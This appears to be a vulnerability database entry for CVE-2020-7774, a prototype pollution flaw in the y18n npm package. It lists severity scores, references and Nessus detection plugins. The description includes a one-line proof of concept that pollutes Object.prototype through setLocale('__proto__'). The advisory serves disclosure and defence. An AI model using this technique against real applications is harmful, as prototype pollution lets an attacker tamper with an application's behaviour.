CVE-2020-7774

HIGH
New! CVE Severity Now Using CVSS v3

The calculated severity for CVEs has been updated to use CVSS v3 by default. CVEs that do not have a CVSS v3 score will fall back CVSS v2 for calculating severity. Severity display preferences can be toggled in the settings dropdown.

Description

This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('__proto__'); y18n.updateLocale({polluted: true}); console.log(polluted); // true

References

https://github.com/yargs/y18n/issues/96

https://github.com/yargs/y18n/pull/108

https://snyk.io/vuln/SNYK-JS-Y18N-1021887

https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038306

https://www.oracle.com/security-alerts/cpuApr2021.html

Details

Source: MITRE

Published: 2020-11-17

Updated: 2021-07-21

Type: CWE-20

Risk Information

CVSS v2

Base Score: 7.5

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Impact Score: 6.4

Exploitability Score: 10

Severity: HIGH

CVSS v3

Base Score: 7.3

Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Impact Score: 3.4

Exploitability Score: 3.9

Severity: HIGH

Tenable Plugins

View all (21 total)

IDNameProductFamilySeverity
151823openSUSE 15 Security Update : nodejs12 (openSUSE-SU-2021:1059-1)NessusSuSE Local Security Checks
high
151818openSUSE 15 Security Update : nodejs10 (openSUSE-SU-2021:1061-1)NessusSuSE Local Security Checks
high
151814openSUSE 15 Security Update : nodejs14 (openSUSE-SU-2021:1060-1)NessusSuSE Local Security Checks
high
151765SUSE SLES15 Security Update : nodejs14 (SUSE-SU-2021:2354-1)NessusSuSE Local Security Checks
high
151758SUSE SLES15 Security Update : nodejs10 (SUSE-SU-2021:2353-1)NessusSuSE Local Security Checks
high
151745openSUSE 15 Security Update : nodejs14 (openSUSE-SU-2021:2354-1)NessusSuSE Local Security Checks
high
151727openSUSE 15 Security Update : nodejs12 (openSUSE-SU-2021:2327-1)NessusSuSE Local Security Checks
high
151723openSUSE 15 Security Update : nodejs10 (openSUSE-SU-2021:2353-1)NessusSuSE Local Security Checks
high
151656SUSE SLES12 Security Update : nodejs10 (SUSE-SU-2021:2323-1)NessusSuSE Local Security Checks
high
151655SUSE SLES15 Security Update : nodejs12 (SUSE-SU-2021:2327-1)NessusSuSE Local Security Checks
high
151650SUSE SLES12 Security Update : nodejs14 (SUSE-SU-2021:2319-1)NessusSuSE Local Security Checks
high
148534FreeBSD : Node.js -- April 2021 Security Releases (c0c1834c-9761-11eb-acfd-0022489ad614)NessusFreeBSD Local Security Checks
high
146802CentOS 8 : nodejs:10 (CESA-2021:0548)NessusCentOS Local Security Checks
high
146638Oracle Linux 8 : nodejs:10 (ELSA-2021-0548)NessusOracle Linux Local Security Checks
high
146637Oracle Linux 8 : nodejs:14 (ELSA-2021-0551)NessusOracle Linux Local Security Checks
high
146548CentOS 8 : nodejs:14 (CESA-2021:0551)NessusCentOS Local Security Checks
high
146547RHEL 8 : nodejs:10 (RHSA-2021:0548)NessusRed Hat Local Security Checks
high
146540RHEL 8 : nodejs:14 (RHSA-2021:0551)NessusRed Hat Local Security Checks
high
145990CentOS 8 : nodejs:12 (CESA-2020:5499)NessusCentOS Local Security Checks
high
144390RHEL 8 : nodejs:12 (RHSA-2020:5499)NessusRed Hat Local Security Checks
high
144372Oracle Linux 8 : nodejs:12 (ELSA-2020-5499)NessusOracle Linux Local Security Checks
high